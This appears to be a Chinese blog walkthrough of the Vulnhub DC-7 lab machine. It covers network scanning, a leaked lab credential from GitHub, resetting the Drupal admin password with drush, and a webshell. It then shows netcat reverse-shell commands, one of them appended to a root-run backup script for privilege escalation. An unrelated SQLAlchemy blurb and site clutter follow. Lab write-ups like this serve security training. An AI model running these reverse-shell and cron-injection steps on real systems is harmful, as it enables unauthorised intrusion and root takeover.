Vulnhub靶场 | DC系列 - DC7

DC-7

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.152。

扫描开放的服务。

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.152

扫描软件版本

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p 22,80 192.168.10.152

直接访问web服务。

使用nikto扫一下~

┌──(root💀kali)-[~/桌面]
└─# nikto -h 192.168.10.152

发现robots.txt文件,这也是web中的比较重要的敏感文件。

通过探索CMS漏洞、apache漏洞等,都没有发现利用的点。

靶机的信息告诉我们跳出思维惯性,页面的最先面有一个@DC7USER,既然是@开头,大概率是某个账号信息。所以尝试去谷歌或者github搜索@DC7USER。

https://github.com/Dc7User/staffdb

https://github.com/Dc7User/staffdb/blob/master/config.php

原来这里存在源码泄露~(这…脑洞得多大才能想出来)

在配置文件config.php中存在一个用户名和密码:

  • dc7user:MdR3xOgB7#dW

尝试登录下网站~

但是,登录不成功。

尝试使用该用户名和密码,ssh登录成功。

开始提权

使用find / -perm -u=s 2>/dev/null查找设置了suid文件。

使用sudo -l 看一下自己的sudo授权,提示没有该命令,但是有个新邮件。

dc7user@dc-7:~$ cat /var/mail/dc7user

邮件中提到了两个文件,一个/opt/scripts/backups.sh/home/dc7user/backups/website.sql

查看/opt/scripts/backups.sh内容

貌似是为了备份网站的脚本。

该文件的权限如下

对于当前的dc7user用户来说没有写权限,如果想再该脚本中写入代码,需要是root用户或者属于www-data组。因此还是需要从网站入手,拿到www-data用户权限。

其中 drush 命令,是为了管理drupal网站的工具。(输入drush <回车>可以查看drush可以执行的操作)。

以下命令是为了将数据库进行备份。

drush sql-dump --result-file=/home/dc7user/backups/website.sql

尝试使用drush修改管理员admin的密码

dc7user@dc-7:~$ drush user-password admin --password="123"

直接修改不成功,需要先切换到/var/www/html目录

dc7user@dc-7:~$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password="123"

使用修改后的密码登录网站成功。

接下来想办法写马,获取到webshell。

直接将马写在文章中,不行,直接原样输出了。

有上传图片的位置,尝试下图片马,很不幸失败了~

在Drupal官网上查询,

使用中国蚁剑连接

使用nc反弹shell到kali

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 5555    // kali监听

// 蚁剑连接
(www-data:/var/www/html) $ nc 192.168.10.146 5555 -e /bin/bash  

使用python获得个交互shell。

www-data@dc-7:/var/www/html$ echo "nc 192.168.10.146 3333 -e /bin/bash" >> /opt/scripts/backups.sh

kali监听,等待计划任务开启,建立连接

📌参考链接

  • 18
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLAlchemy 是一个 SQL 工具包和对象关系映射(ORM)库,用于 Python 编程语言。它提供了一个高级的 SQL 工具和对象关系映射工具,允许开发者以 Python 类和对象的形式操作数据库,而无需编写大量的 SQL 语句。SQLAlchemy 建立在 DBAPI 之上,支持多种数据库后端,如 SQLite, MySQL, PostgreSQL 等。 SQLAlchemy 的核心功能: 对象关系映射(ORM): SQLAlchemy 允许开发者使用 Python 类来表示数据库表,使用类的实例表示表中的行。 开发者可以定义类之间的关系(如一对多、多对多),SQLAlchemy 会自动处理这些关系在数据库中的映射。 通过 ORM,开发者可以像操作 Python 对象一样操作数据库,这大大简化了数据库操作的复杂性。 表达式语言: SQLAlchemy 提供了一个丰富的 SQL 表达式语言,允许开发者以 Python 表达式的方式编写复杂的 SQL 查询。 表达式语言提供了对 SQL 语句的灵活控制,同时保持了代码的可读性和可维护性。 数据库引擎和连接池: SQLAlchemy 支持多种数据库后端,并且为每种后端提供了对应的数据库引擎。 它还提供了连接池管理功能,以优化数据库连接的创建、使用和释放。 会话管理: SQLAlchemy 使用会话(Session)来管理对象的持久化状态。 会话提供了一个工作单元(unit of work)和身份映射(identity map)的概念,使得对象的状态管理和查询更加高效。 事件系统: SQLAlchemy 提供了一个事件系统,允许开发者在 ORM 的各个生命周期阶段插入自定义的钩子函数。 这使得开发者可以在对象加载、修改、删除等操作时执行额外的逻辑。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值